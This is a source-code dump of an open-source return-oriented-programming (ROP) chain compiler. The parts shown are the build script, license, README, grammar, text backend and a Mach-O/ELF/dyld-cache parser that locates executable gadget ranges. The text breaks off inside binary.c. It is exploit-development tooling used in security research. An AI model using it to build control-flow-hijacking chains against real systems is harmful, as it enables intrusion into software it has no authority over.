├── Build.sh ├── LICENSE ├── README ├── R_compiler.txt ├── R_syntax.bnf ├── backarm.c ├── backarm64.c ├── backend.h ├── backtxt.c ├── backx86.c ├── backx86_64.c ├── binary.c ├── binary.h ├── code.c ├── code.h ├── config.h ├── cycle.c ├── cycle.h ├── depend ├── elf.h ├── emit.c ├── emit.h ├── lexer.c ├── lexer.h ├── parser.c ├── parser.h ├── qwerty ├── payload.asm ├── payload.inc ├── rope.asm ├── rope.c └── test.c ├── ropc.c ├── sample ├── Makefile ├── Makefile.dry ├── Makefile.linux ├── Makefile.macos ├── README ├── dyld_shared_cache_arm64 ├── dyld_shared_cache_armv7 ├── dyld_shared_cache_i386 ├── dyld_shared_cache_x86_64 ├── ent.xml ├── loader.c ├── rope.c ├── rope2.c ├── rope3.c ├── rope3a.c ├── wrap-arm.asm ├── wrap-arm64.asm ├── wrap-x86.asm └── wrap-x86_64.asm ├── symtab.c ├── symtab.h ├── util.c └── util.h /Build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # bash (not plain sh) is required: 'function' and the arrays below are bashisms 3 | function build() { 4 | gcc -o "$1" -Wall -W -pedantic -O2 -I. -g -Wno-unused-parameter -Wno-unused-function \ 5 | lexer.c \ 6 | parser.c \ 7 | cycle.c \ 8 | code.c \ 9 | emit.c \ 10 | symtab.c \ 11 | "$2" \ 12 | binary.c \ 13 | util.c \ 14 | ropc.c 15 | } 16 | 17 | if [ $# -eq 0 ]; then 18 | build ropc backend.c 19 | exit 20 | fi 21 | 22 | ARCHS=("$@") 23 | 24 | if [ "x$1" = "xall" ]; then 25 | ARCHS=(arm arm64 x86 x86_64 txt) 26 | fi 27 | 28 | for i in "${ARCHS[@]}"; do 29 | build "ropc-$i" "back$i.c" 30 | done 31 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | ROP Compiler 2 | 3 | Copyright (c) 2012 xerub 4 | 5 | This program is free software; you can redistribute it and/or modify 6 | it under the terms of the GNU General Public License as published by 7 | the Free Software Foundation; either version 2 of the License, or 8 | (at your option) any later version. 
9 | 10 | This program is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | GNU General Public License for more details. 14 | 15 | You should have received a copy of the GNU General Public License 16 | along with this program. If not, see <http://www.gnu.org/licenses/>. 17 | -------------------------------------------------------------------------------- /README: -------------------------------------------------------------------------------- 1 | 1. The input is a C-like preprocessed source, the output is a NASM-like strip. 2 | dg -> define gadget, which must be slid by library slide 3 | du -> define local, which must be slid by strip slide 4 | dd -> define data (%define dd -> dq for 64bit) 5 | 6 | 2. we implement lazy assignment. that is, an assignment is not guaranteed 7 | to generate code, it only guarantees that when first using the assigned 8 | variable, it will have the desired value. however, since we do not have 9 | proper flow analysis, any assignment in a loop cannot be lazy. see 'const' 10 | 11 | 3. immediate expressions involving local pointers cannot be simplified, unless 12 | they can be reduced to: PTR + scalar. that is because there is one single 13 | final addition applied by the assembler, after full evaluation. 14 | 15 | 4. strings are treated as implicit addresses. therefore, 16 | b = "a" + 1 17 | really means: 18 | str = "a" 19 | b = &str + 1 20 | also, compound expressions are treated just like strings, with "long" 21 | values instead of characters 22 | 23 | 5. imports are implicit addresses. to actually use external variables, do 24 | *optind = 0; 25 | a = *optind; 26 | 27 | 6. sometimes, it is better to use multiple assignments for the same value 28 | fd = fd2 = open(...); 29 | read(fd, ...); 30 | close(fd2); 31 | instead of 32 | fd = open(...); 33 | read(fd, ...); 34 | close(fd); 35 | 36 | 7. 
this contrived load/store architecture stems from the assumptions that 37 | some rop gadgets are hard -- or impossible -- to find. for example, 38 | it is hard to load r1 without r0 39 | 40 | 8. jumping to labels in the past is tricky, because stack above us is 41 | destroyed by calls in-between. for the same reason, parameters 42 | referencing things in the past are WRONG: 43 | label: 44 | x = 1; 45 | printf("x=%x\n", x); 46 | if (modify(&x)) goto label; 47 | stack above modify is destroyed, so jumping back to label is problematic. 48 | also, any use of *(&x) is probably doomed. therefore, we need to reserve 49 | some stack space before any such calls. see '[[stack]]' 50 | 51 | ==== 52 | 53 | const: 54 | used for 55 | var = immediate 56 | to avoid generating 57 | *&var = immediate 58 | var is inlined and defined as immediate, when possible 59 | useful inside loops 60 | 61 | volatile: 62 | used for 63 | x = var 64 | to force generating 65 | x = *&var 66 | var is never inlined 67 | needed when a variable is used before and after a function call 68 | 69 | therefore 70 | "const volatile" is perfectly ok :) 71 | because the var will never be inlined, but will not generate code for assignment 72 | 73 | ==== 74 | 75 | extern function[[attr]]; 76 | a = function; 77 | a(); will not respect import attributes 78 | [[attr]]a(); will respect call attributes 79 | -------------------------------------------------------------------------------- /R_compiler.txt: -------------------------------------------------------------------------------- 1 | Part 2. 
The Lexer 2 | ================= 3 | 4 | The lexer recognizes C preprocessor output directives: 5 | # NUMBER "filename" 6 | #line NUMBER "filename" 7 | 8 | Keywords: 9 | if T_K_IF 10 | else T_K_ELSE 11 | do T_K_DO 12 | while T_K_WHILE 13 | break T_K_BREAK 14 | continue T_K_CONTINUE 15 | goto T_K_GOTO 16 | const T_K_CONST 17 | extern T_K_EXTERN 18 | volatile T_K_VOLATILE 19 | Regular tokens: 20 | : T_COLON 21 | ; T_SEMICOLON 22 | , T_COMMA 23 | { T_OPENCURLY 24 | } T_CLOSECURLY 25 | [ T_OPENSQUARE 26 | ] T_CLOSESQUARE 27 | ( T_OPENBRACE 28 | ) T_CLOSEBRACE 29 | = T_ASSIGN 30 | ! T_LOGICNOT 31 | + T_ADD 32 | - T_SUB 33 | * T_MUL 34 | / T_DIV 35 | | T_OR 36 | ^ T_XOR 37 | & T_AND 38 | @ T_AT 39 | Strings: 40 | "a" T_STRING 41 | Numbers: 42 | 0x1, 077, 5 T_INT 43 | 'a' T_INT 44 | Identifiers: 45 | a3, bla T_ID 46 | 47 | Adjacent strings can be merged into one single string. 48 | 49 | Part 3. The Parser 50 | ================== 51 | 52 | Will parse the source into a list of "struct the_node". 53 | struct the_node::next contains the next node in source 54 | struct the_node::edge[] contains the following nodes in execution flow 55 | struct the_node::code code to emit: a list of nodes representing statements 56 | -------------------------------------------------------------------------------- /R_syntax.bnf: -------------------------------------------------------------------------------- 1 | translation_unit : stat_or_decl_list 2 | ; 3 | stat_or_decl_list : stat_or_decl 4 | | stat_or_decl_list stat_or_decl 5 | ; 6 | stat_or_decl : stat 7 | | external_decl ';' 8 | ; 9 | external_decl : "extern" ID 10 | | "extern" ID attribute_spec 11 | | "extern" ID '=' NUMBER 12 | | "extern" ID attribute_spec '=' NUMBER 13 | ; 14 | stat : labeled_stat 15 | | ';' 16 | | '{' stat_or_decl_list '}' 17 | | jump_stat 18 | | selection_stat 19 | | assignment_exp ';' 20 | ; 21 | labeled_stat : ID ':' stat 22 | ; 23 | jump_stat : "goto" ID ';' 24 | | "break" ';' 25 | | "continue" ';' 26 | ; 27 | 
selection_stat : "if" conditional_exp stat 28 | | "if" conditional_exp stat "else" stat 29 | | "do" stat "while" conditional_exp ';' 30 | | "while" conditional_exp stat 31 | ; 32 | conditional_exp : '(' assignment_exp ')' 33 | | '!' '(' assignment_exp ')' 34 | ; 35 | assignment_exp : or_exp 36 | | lvalue_exp '=' assignment_exp 37 | ; 38 | or_exp : xor_exp 39 | | or_exp '|' xor_exp 40 | ; 41 | xor_exp : and_exp 42 | | xor_exp '^' and_exp 43 | ; 44 | and_exp : additive_exp 45 | | and_exp '&' additive_exp 46 | ; 47 | additive_exp : multiplicative_exp 48 | | additive_exp '+' multiplicative_exp 49 | | additive_exp '-' multiplicative_exp 50 | ; 51 | multiplicative_exp : rvalue_exp 52 | | multiplicative_exp '*' rvalue_exp 53 | | multiplicative_exp '/' rvalue_exp 54 | ; 55 | rvalue_exp : immediate_exp 56 | | lvalue_exp 57 | | ID '(' ')' 58 | | ID '(' argument_exp_list ')' 59 | | attribute_spec ID '(' ')' 60 | | attribute_spec ID '(' argument_exp_list ')' 61 | | '(' or_exp ')' 62 | ; 63 | argument_exp_list : or_exp 64 | | or_exp ',' argument_exp_list 65 | ; 66 | lvalue_exp : '*' ID 67 | | ID 68 | | type_qualifier ID 69 | ; 70 | type_qualifier : "const" | "volatile" 71 | ; 72 | immediate_exp : NUMBER 73 | | '+' NUMBER 74 | | '-' NUMBER 75 | | STRING 76 | | '@' STRING 77 | | '&' ID 78 | | '{' initializer_list '}' 79 | ; 80 | initializer_list : immediate_exp 81 | | initializer_list ',' immediate_exp 82 | ; 83 | attribute_spec : '[' '[' attribute_list ']' ']' 84 | ; 85 | attribute_list : attribute 86 | | attribute ',' attribute_list 87 | ; 88 | attribute : "noreturn" | "stdcall" | "stack" 89 | | "regparm" '=' NUMBER 90 | | "stack" '=' NUMBER 91 | ; 92 | -------------------------------------------------------------------------------- /backend.h: -------------------------------------------------------------------------------- 1 | #ifndef BACKEND_H_ 2 | #define BACKEND_H_ 3 | 4 | extern const int arch_regparm; 5 | 6 | void emit_initialize(void); 7 | void emit_finalize(void); 8 | 9 | 
void emit_load_direct(const char *value, BOOL deref0); 10 | void emit_load_indirect(const char *lvalue, BOOL deref0); 11 | void emit_store_indirect(const char *lvalue); 12 | void emit_store_direct(const char *lvalue); 13 | void emit_or(const char *value, const char *addend, int deref0, BOOL swap); 14 | void emit_xor(const char *value, const char *addend, int deref0, BOOL swap); 15 | void emit_and(const char *value, const char *addend, int deref0, BOOL swap); 16 | void emit_add(const char *value, const char *addend, int deref0, BOOL swap); 17 | void emit_sub(const char *value, const char *addend, int deref0); 18 | void emit_mul(const char *value, const char *multiplier, int deref0, BOOL swap); 19 | void emit_div(const char *value, const char *multiplier, int deref0); 20 | void emit_call(const char *func, char **args, int nargs, int deref0, BOOL reserve, BOOL retval, int attr, int regparm, int restack); 21 | 22 | char *emit_save(void); 23 | void emit_restore(char *scratch); 24 | 25 | void emit_goto(const char *label); 26 | void emit_cond(const char *label, enum cond_t cond); 27 | void emit_label(const char *label, int used, BOOL last); 28 | void emit_extern(const char *import, unsigned long long val, int attr, int regparm); 29 | void emit_fast(const char *var, const char *val); 30 | 31 | int backend_test_gadgets(int verbose); 32 | const char *backend_name(void); 33 | 34 | #endif 35 | -------------------------------------------------------------------------------- /backtxt.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "config.h" 7 | #include "util.h" 8 | #include "code.h" 9 | #include "backend.h" 10 | #include "binary.h" 11 | #include "symtab.h" 12 | 13 | 14 | const int arch_regparm = 4; 15 | 16 | 17 | static uint64_t 18 | solve_import(const char *p) 19 | { 20 | if (binmap) { 21 | uint64_t rv; 22 | char *tmp = prepend('_', p); 23 | rv = 
parse_symbols(binmap, tmp); 24 | free(tmp); 25 | if (!rv) { 26 | die("undefined import '%s'\n", p); 27 | } 28 | return rv; 29 | } 30 | return hash(p); 31 | } 32 | 33 | 34 | static void 35 | load_value(int i, int ch, const char *arg) 36 | { 37 | if (arg) { 38 | const struct SYM *p; 39 | if (is_address(arg)) { 40 | char *na = curate_address(arg); 41 | printx(" %c%d = &%s\n", ch, i, na); 42 | free(na); 43 | return; 44 | } 45 | p = get_symbol(arg); 46 | if (p) { 47 | if (p->type == SYMBOL_EXTERN) { 48 | printx(" %c%d = %-22s // extern: 0x%llx\n", ch, i, arg, p->addr); 49 | } else if (p->type == SYMBOL_LABEL) { 50 | printx(" %c%d = &%-21s // label\n", ch, i, p->key); 51 | } else { 52 | assert(p->type == SYMBOL_NORMAL); 53 | if (p->val && is_address(p->val)) { 54 | char *na = curate_address(p->val); 55 | printx(" %c%d = %-22s // = &%s\n", ch, i, arg, na); 56 | free(na); 57 | } else if (p->val && try_symbol_extern(p->val)) { 58 | printx(" %c%d = %-22s // = %s (extern: 0x%llx)\n", ch, i, arg, p->val, get_symbol(p->val)->addr); 59 | } else { 60 | printx(" %c%d = %-22s // = %s\n", ch, i, arg, p->val ? p->val : "0"); 61 | } 62 | } 63 | return; 64 | } 65 | } 66 | printx(" %c%d = %s\n", ch, i, arg ? 
arg : "0"); 67 | } 68 | 69 | 70 | void 71 | emit_finalize(void) 72 | { 73 | } 74 | 75 | 76 | void 77 | emit_load_direct(const char *value, BOOL deref0) 78 | { 79 | load_value(0, 'r', value); 80 | if (deref0) { 81 | printx(" r0 = *r0\n"); 82 | } 83 | } 84 | 85 | 86 | void 87 | emit_load_indirect(const char *lvalue, BOOL deref0) 88 | { 89 | char *tmp = create_address_str(lvalue, 0); 90 | load_value(0, 'r', tmp); 91 | printx(" r0 = *r0\n"); 92 | if (deref0) { 93 | printx(" r0 = *r0\n"); 94 | } 95 | free(tmp); 96 | } 97 | 98 | 99 | void 100 | emit_store_indirect(const char *lvalue) 101 | { 102 | char *tmp = create_address_str(lvalue, 0); 103 | load_value(4, 'r', tmp); 104 | printx(" *r4 = r0\n"); 105 | free(tmp); 106 | } 107 | 108 | 109 | void 110 | emit_store_direct(const char *lvalue) 111 | { 112 | load_value(4, 'r', lvalue); 113 | printx(" *r4 = r0\n"); 114 | } 115 | 116 | 117 | void 118 | emit_or(const char *value, const char *addend, int deref0, BOOL swap) 119 | { 120 | SWAP_PTR(swap, value, addend); 121 | load_value(1, 'r', addend); 122 | load_value(0, 'r', value); 123 | while (deref0--) { 124 | printx(" r0 = *r0\n"); 125 | } 126 | printx(" r0 |= r1\n"); 127 | } 128 | 129 | 130 | void 131 | emit_xor(const char *value, const char *addend, int deref0, BOOL swap) 132 | { 133 | SWAP_PTR(swap, value, addend); 134 | load_value(1, 'r', addend); 135 | load_value(0, 'r', value); 136 | while (deref0--) { 137 | printx(" r0 = *r0\n"); 138 | } 139 | printx(" r0 ^= r1\n"); 140 | } 141 | 142 | 143 | void 144 | emit_and(const char *value, const char *addend, int deref0, BOOL swap) 145 | { 146 | SWAP_PTR(swap, value, addend); 147 | load_value(1, 'r', addend); 148 | load_value(0, 'r', value); 149 | while (deref0--) { 150 | printx(" r0 = *r0\n"); 151 | } 152 | printx(" r0 &= r1\n"); 153 | } 154 | 155 | 156 | void 157 | emit_add(const char *value, const char *addend, int deref0, BOOL swap) 158 | { 159 | SWAP_PTR(swap, value, addend); 160 | load_value(1, 'r', addend); 161 | 
load_value(0, 'r', value); 162 | while (deref0--) { 163 | printx(" r0 = *r0\n"); 164 | } 165 | printx(" r0 += r1\n"); 166 | } 167 | 168 | 169 | void 170 | emit_sub(const char *value, const char *addend, int deref0) 171 | { 172 | load_value(1, 'r', addend); 173 | load_value(0, 'r', value); 174 | while (deref0--) { 175 | printx(" r0 = *r0\n"); 176 | } 177 | printx(" r0 -= r1\n"); 178 | } 179 | 180 | 181 | void 182 | emit_mul(const char *value, const char *multiplier, int deref0, BOOL swap) 183 | { 184 | SWAP_PTR(swap, value, multiplier); 185 | load_value(1, 'r', multiplier); 186 | load_value(0, 'r', value); 187 | while (deref0--) { 188 | printx(" r0 = *r0\n"); 189 | } 190 | printx(" r0 *= r1\n"); 191 | } 192 | 193 | 194 | void 195 | emit_div(const char *value, const char *multiplier, int deref0) 196 | { 197 | load_value(1, 'r', multiplier); 198 | load_value(0, 'r', value); 199 | while (deref0--) { 200 | printx(" r0 = *r0\n"); 201 | } 202 | printx(" r0 /= r1\n"); 203 | } 204 | 205 | 206 | void 207 | emit_call(const char *func, char **args, int nargs, int deref0, BOOL inloop, BOOL retval, int attr, int regparm, int restack) 208 | { 209 | char *tmp = NULL; 210 | int rargs = nargs; 211 | if (args == NULL) { 212 | rargs = nargs = 0; 213 | } 214 | if (rargs > regparm) { 215 | rargs = regparm; 216 | } 217 | if (rargs) { 218 | assert(rargs <= 4); 219 | switch (rargs) { 220 | case 4: 221 | load_value(3, 'r', args[3]); 222 | case 3: 223 | load_value(2, 'r', args[2]); 224 | case 2: 225 | load_value(1, 'r', args[1]); 226 | case 1: 227 | load_value(0, 'r', args[0]); 228 | } 229 | } 230 | while (deref0--) { 231 | printx(" r0 = *r0\n"); 232 | } 233 | if (attr & ATTRIB_NORETURN) { 234 | if (nargs > rargs) { 235 | printx(" %s{%d}\n", func, nargs - rargs); 236 | } else { 237 | printx(" %s\n", func); 238 | } 239 | for (; rargs < nargs; rargs++) { 240 | load_value(rargs - regparm, 'a', args[rargs]); 241 | } 242 | return; 243 | } 244 | load_value(4, 'r', func); 245 | if ((attr & 
ATTRIB_STACK) || inloop) { 246 | printx(" stack 0x%x\n", (restack > 0) ? restack : inloop_stack); 247 | } 248 | if (inloop) { 249 | tmp = new_name("res"); 250 | add_label(tmp, 0xdead); 251 | printx("%s:\n", tmp); 252 | } 253 | if (!(attr & ATTRIB_STDCALL) && nargs > rargs) { 254 | printx(" call r4{%d}\n", nargs - rargs); 255 | } else { 256 | printx(" call r4\n"); 257 | } 258 | for (; rargs < nargs; rargs++) { 259 | load_value(rargs - regparm, 'a', args[rargs]); 260 | } 261 | if (inloop) { 262 | char *sav; 263 | char *gdg = new_name("gdg"); 264 | if (retval) { 265 | sav = emit_save(); 266 | } 267 | add_extern(gdg, 0xca11, 0, -1); 268 | make_symbol_used(gdg); 269 | emit_load_direct(gdg, FALSE); 270 | emit_store_indirect(tmp); 271 | if (retval) { 272 | emit_restore(sav); 273 | } 274 | free(gdg); 275 | } 276 | free(tmp); 277 | } 278 | 279 | 280 | char * 281 | emit_save(void) 282 | { 283 | #ifdef SLOW_LOAD_SAVE 284 | char *scratch = new_name("tmp"); 285 | add_symbol_forward(scratch, 0); 286 | emit_store_indirect(scratch); 287 | return scratch; 288 | #else 289 | printx(" r1 = r0\n"); 290 | return NULL; 291 | #endif 292 | } 293 | 294 | 295 | void 296 | emit_restore(char *scratch) 297 | { 298 | #ifdef SLOW_LOAD_SAVE 299 | assert(scratch); 300 | emit_load_direct(scratch, FALSE); 301 | make_symbol_used(scratch); 302 | free(scratch); 303 | #else 304 | printx(" r0 = r1\n"); 305 | (void)scratch; 306 | #endif 307 | } 308 | 309 | 310 | void 311 | emit_goto(const char *label) 312 | { 313 | printx(" goto %s\n", label); 314 | } 315 | 316 | 317 | void 318 | emit_cond(const char *label, enum cond_t cond) 319 | { 320 | BOOL inverse = (cond == COND_EQ); 321 | assert(cond == COND_NE || cond == COND_EQ); 322 | printx(" if %s(r0) goto %s\n", inverse ? "!" 
: "", label); 323 | } 324 | 325 | 326 | void 327 | emit_label(const char *label, int used, BOOL last) 328 | { 329 | add_label(label, 0x1abe1); 330 | if (!used) { 331 | printx("%s:\n", label); 332 | cry("unused label '%s'\n", label); 333 | } else if (last) { 334 | printx("%s:\n", label); 335 | } else { 336 | printx("%s:\n", label); 337 | } 338 | } 339 | 340 | 341 | void 342 | emit_extern(const char *import, unsigned long long val, int attr, int regparm) 343 | { 344 | /* should not emit anything, but add symbol as extern */ 345 | printx(";;; extern %s\n", import); 346 | add_extern(import, (val != -1ULL) ? val : solve_import(import), attr, regparm); 347 | } 348 | 349 | 350 | void 351 | emit_fast(const char *var, const char *val) 352 | { 353 | /* should not emit anything, this is for informative purposes only */ 354 | printx(";;; %s := %s\n", var, val); 355 | } 356 | 357 | 358 | void 359 | emit_initialize(void) 360 | { 361 | } 362 | 363 | 364 | int 365 | backend_test_gadgets(int verbose) 366 | { 367 | return 0; 368 | } 369 | 370 | 371 | const char * 372 | backend_name(void) 373 | { 374 | return "text"; 375 | } 376 | -------------------------------------------------------------------------------- /binary.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #include 9 | #include 10 | #include 11 | 12 | #include 13 | #include 14 | 15 | #include "elf.h" 16 | #include "binary.h" 17 | 18 | 19 | #define printf(...) 20 | 21 | 22 | /* cache */ 23 | 24 | 25 | struct dyld_cache_header { 26 | char magic[16]; /* e.g. 
"dyld_v0 ppc" */ 27 | uint32_t mappingOffset; /* file offset to first dyld_cache_mapping_info */ 28 | uint32_t mappingCount; /* number of dyld_cache_mapping_info entries */ 29 | uint32_t imagesOffset; /* file offset to first dyld_cache_image_info */ 30 | uint32_t imagesCount; /* number of dyld_cache_image_info entries */ 31 | uint64_t dyldBaseAddress; /* base address of dyld when cache was built */ 32 | uint64_t codeSignatureOffset; /* file offset in of code signature blob */ 33 | uint64_t codeSignatureSize; /* size of code signature blob (zero means to end of file) */ 34 | }; 35 | 36 | struct dyld_cache_mapping_info { 37 | uint64_t address; 38 | uint64_t size; 39 | uint64_t fileOffset; 40 | uint32_t maxProt; 41 | uint32_t initProt; 42 | }; 43 | 44 | struct dyld_cache_image_info { 45 | uint64_t address; 46 | uint64_t modTime; 47 | uint64_t inode; 48 | uint32_t pathFileOffset; 49 | uint32_t pad; 50 | }; 51 | 52 | 53 | static uint32_t 54 | find_mapping(uint32_t mappingCount, const struct dyld_cache_mapping_info map[], uint64_t address) 55 | { 56 | uint32_t j, pos; 57 | uint64_t max = 0; 58 | for (pos = -1, j = 0; j < mappingCount; j++) { 59 | if (map[j].address <= address) { 60 | if (max < map[j].address) { 61 | max = map[j].address; 62 | pos = j; 63 | } 64 | } 65 | } 66 | return pos; 67 | } 68 | 69 | 70 | /* ranges */ 71 | 72 | 73 | struct range { 74 | struct range *next; 75 | uint64_t offset; 76 | uint64_t vmaddr; 77 | uint32_t filesize; 78 | }; 79 | 80 | 81 | unsigned long gadget_limit = -1; 82 | 83 | 84 | static struct range * 85 | add_range(struct range *ranges, uint64_t offset, uint64_t vmaddr, uint32_t filesize) 86 | { 87 | struct range *r; 88 | if (offset >= gadget_limit) { 89 | return ranges; 90 | } 91 | if (offset + filesize > gadget_limit) { 92 | filesize = gadget_limit - offset; 93 | } 94 | for (r = ranges; r; r = r->next) { 95 | if (r->vmaddr == vmaddr) { 96 | return ranges; 97 | } 98 | } 99 | r = malloc(sizeof(struct range)); 100 | assert(r); 101 | 
r->offset = offset; 102 | r->vmaddr = vmaddr; 103 | r->filesize = filesize; 104 | r->next = ranges; 105 | return r; 106 | } 107 | 108 | 109 | void 110 | delete_ranges(struct range *ranges) 111 | { 112 | struct range *r; 113 | for (r = ranges; r; ) { 114 | struct range *q = r->next; 115 | free(r); 116 | r = q; 117 | } 118 | } 119 | 120 | 121 | static void * 122 | reverse_list(void *n) 123 | { 124 | struct range *prev = NULL; 125 | struct range *node = n; 126 | while (node) { 127 | struct range *next = node->next; 128 | node->next = prev; 129 | prev = node; 130 | node = next; 131 | } 132 | return prev; 133 | } 134 | 135 | 136 | static struct range * 137 | parse_macho_ranges(const unsigned char *p, struct range *ranges) 138 | { 139 | unsigned int i; 140 | const struct mach_header *hdr = (struct mach_header *)p; 141 | char *q; 142 | 143 | int is64 = (hdr->magic & 1) * 4; 144 | 145 | if ((hdr->magic & ~1) != 0xfeedface) { 146 | return ranges; 147 | } 148 | 149 | q = (char *)(p + sizeof(struct mach_header) + is64); 150 | for (i = 0; i < hdr->ncmds; i++) { 151 | const struct load_command *cmd = (struct load_command *)q; 152 | uint32_t c = cmd->cmd; 153 | if (c == LC_SEGMENT) { 154 | const struct segment_command *seg = (struct segment_command *)q; 155 | if (seg->initprot & 4) { 156 | ranges = add_range(ranges, seg->fileoff, seg->vmaddr, seg->filesize); 157 | } 158 | } 159 | if (c == LC_SEGMENT_64) { 160 | const struct segment_command_64 *seg = (struct segment_command_64 *)q; 161 | if (seg->initprot & 4) { 162 | ranges = add_range(ranges, seg->fileoff, seg->vmaddr, seg->filesize); 163 | } 164 | } 165 | q = q + cmd->cmdsize; 166 | } 167 | 168 | return ranges; 169 | } 170 | 171 | 172 | #ifdef FILTER_DYLIBS 173 | static const char *filter_dylib[] = { 174 | "/usr/lib/libSystem.B.dylib", 175 | "/usr/lib/system/libcache.dylib", 176 | "/usr/lib/system/libcommonCrypto.dylib", 177 | "/usr/lib/system/libcompiler_rt.dylib", 178 | "/usr/lib/system/libcopyfile.dylib", 179 | 
"/usr/lib/system/libcorecrypto.dylib", 180 | "/usr/lib/system/libdispatch.dylib", 181 | "/usr/lib/system/libdyld.dylib", 182 | "/usr/lib/system/libkeymgr.dylib", 183 | "/usr/lib/system/liblaunch.dylib", 184 | "/usr/lib/system/libmacho.dylib", 185 | "/usr/lib/system/libquarantine.dylib", 186 | "/usr/lib/system/libremovefile.dylib", 187 | "/usr/lib/system/libsystem_asl.dylib", 188 | "/usr/lib/system/libsystem_blocks.dylib", 189 | "/usr/lib/system/libsystem_c.dylib", 190 | "/usr/lib/system/libsystem_configuration.dylib", 191 | "/usr/lib/system/libsystem_coreservices.dylib", 192 | "/usr/lib/system/libsystem_darwin.dylib", 193 | "/usr/lib/system/libsystem_dnssd.dylib", 194 | "/usr/lib/system/libsystem_info.dylib", 195 | "/usr/lib/system/libsystem_m.dylib", 196 | "/usr/lib/system/libsystem_malloc.dylib", 197 | "/usr/lib/system/libsystem_networkextension.dylib", 198 | "/usr/lib/system/libsystem_notify.dylib", 199 | "/usr/lib/system/libsystem_sandbox.dylib", 200 | "/usr/lib/system/libsystem_secinit.dylib", 201 | "/usr/lib/system/libsystem_kernel.dylib", 202 | "/usr/lib/system/libsystem_platform.dylib", 203 | "/usr/lib/system/libsystem_pthread.dylib", 204 | "/usr/lib/system/libsystem_symptoms.dylib", 205 | "/usr/lib/system/libsystem_trace.dylib", 206 | "/usr/lib/system/libunwind.dylib", 207 | "/usr/lib/system/libxpc.dylib", 208 | "/usr/lib/libobjc.A.dylib", 209 | "/usr/lib/libc++abi.dylib", 210 | "/usr/lib/libc++.1.dylib", 211 | NULL 212 | }; 213 | #endif 214 | 215 | 216 | static struct range * 217 | parse_cache_ranges(const unsigned char *p, struct range *ranges) 218 | { 219 | unsigned i; 220 | const struct dyld_cache_header *hdr = (struct dyld_cache_header *)p; 221 | const struct dyld_cache_mapping_info *map = (struct dyld_cache_mapping_info *)(p + hdr->mappingOffset); 222 | #ifdef FILTER_DYLIBS 223 | const struct dyld_cache_image_info *img = (struct dyld_cache_image_info *)(p + hdr->imagesOffset); 224 | for (i = 0; i < hdr->imagesCount; i++) { 225 | unsigned k; 226 | for 
(k = 0; filter_dylib[k]; k++) { 227 | if (!strcmp((char *)p + img[i].pathFileOffset, filter_dylib[k])) { 228 | uint64_t address = img[i].address; 229 | int j = find_mapping(hdr->mappingCount, map, address); 230 | if (j != -1) { 231 | ranges = parse_macho_ranges(p + address - map[j].address + map[j].fileOffset, ranges); 232 | } 233 | break; 234 | } 235 | } 236 | } 237 | #else 238 | for (i = 0; i < hdr->mappingCount; i++) { 239 | if (map[i].initProt & 4) { 240 | ranges = add_range(ranges, map[i].fileOffset, map[i].address, map[i].size); 241 | } 242 | } 243 | #endif 244 | return ranges; 245 | } 246 | 247 | 248 | static struct range * 249 | parse_elf32_ranges(const unsigned char *p, struct range *ranges) 250 | { 251 | unsigned i; 252 | const Elf32_Ehdr *hdr = (Elf32_Ehdr *)p; 253 | const Elf32_Phdr *phdr = (Elf32_Phdr *)(p + hdr->e_phoff); 254 | 255 | for (i = 0; i < hdr->e_phnum; i++) { 256 | if (phdr->p_type == PT_LOAD) { 257 | if (phdr->p_flags & PF_X) { 258 | ranges = add_range(ranges, phdr->p_offset, phdr->p_vaddr, phdr->p_filesz); 259 | } 260 | } 261 | phdr++; 262 | } 263 | 264 | return ranges; 265 | } 266 | 267 | static struct range * 268 | parse_elf64_ranges(const unsigned char *p, struct range *ranges) 269 | { 270 | unsigned i; 271 | const Elf64_Ehdr *hdr = (Elf64_Ehdr *)p; 272 | const Elf64_Phdr *phdr = (Elf64_Phdr *)(p + hdr->e_phoff); 273 | 274 | for (i = 0; i < hdr->e_phnum; i++) { 275 | if (phdr->p_type == PT_LOAD) { 276 | if (phdr->p_flags & PF_X) { 277 | ranges = add_range(ranges, phdr->p_offset, phdr->p_vaddr, phdr->p_filesz); 278 | } 279 | } 280 | phdr++; 281 | } 282 | 283 | return ranges; 284 | } 285 | 286 | 287 | struct range * 288 | parse_ranges(const unsigned char *p, size_t sz) 289 | { 290 | struct range *ranges; 291 | if (!strncmp((char *)p, "dyld_v1 ", 8)) { 292 | ranges = parse_cache_ranges(p, NULL); 293 | } else if ((*(unsigned *)p & ~1) == 0xfeedface) { 294 | ranges = parse_macho_ranges(p, NULL); 295 | } else if (!memcmp(p, "\177ELF\001", 
5)) { 296 | ranges = parse_elf32_ranges(p, NULL); 297 | } else if (!memcmp(p, "\177ELF\002", 5)) { 298 | ranges = parse_elf64_ranges(p, NULL); 299 | } else { 300 | ranges = add_range(NULL, 0, 0, sz); 301 | } 302 | return reverse_list(ranges); 303 | } 304 | 305 | 306 | /* symbols */ 307 | 308 | /* Look up 'key' among the externally defined symbols of the Mach-O image found at offset 'address' inside buffer 'p'. The nlist entries [iextdefsym, iextdefsym + nextdefsym) are binary-searched by name (this assumes they are sorted by name). Returns the symbol value with bit 0 set when N_ARM_THUMB_DEF is flagged, or 0 when the image magic is not Mach-O or the key is not found. */ 309 | static uint64_t 310 | parse_macho_symbols(const unsigned char *p, uint64_t address, const char *key) 311 | { 312 | unsigned int i; 313 | const struct mach_header *hdr = (struct mach_header *)(p + address); 314 | char *q; 315 | 316 | uint32_t stroff = 0; 317 | uint32_t symoff = 0; 318 | int iextdefsym = -1; 319 | int nextdefsym = -1; 320 | 321 | int is64 = (hdr->magic & 1) * 4; 322 | 323 | if ((hdr->magic & ~1) != 0xfeedface) { 324 | return 0; 325 | } 326 | 327 | q = (char *)(p + address + sizeof(struct mach_header) + is64); 328 | for (i = 0; i < hdr->ncmds; i++) { 329 | const struct load_command *cmd = (struct load_command *)q; 330 | uint32_t c = cmd->cmd; 331 | if (c == LC_SYMTAB) { 332 | struct symtab_command *sym = (struct symtab_command *)q; 333 | symoff = sym->symoff; 334 | stroff = sym->stroff; 335 | } else if (c == LC_DYSYMTAB) { 336 | struct dysymtab_command *sym = (struct dysymtab_command *)q; 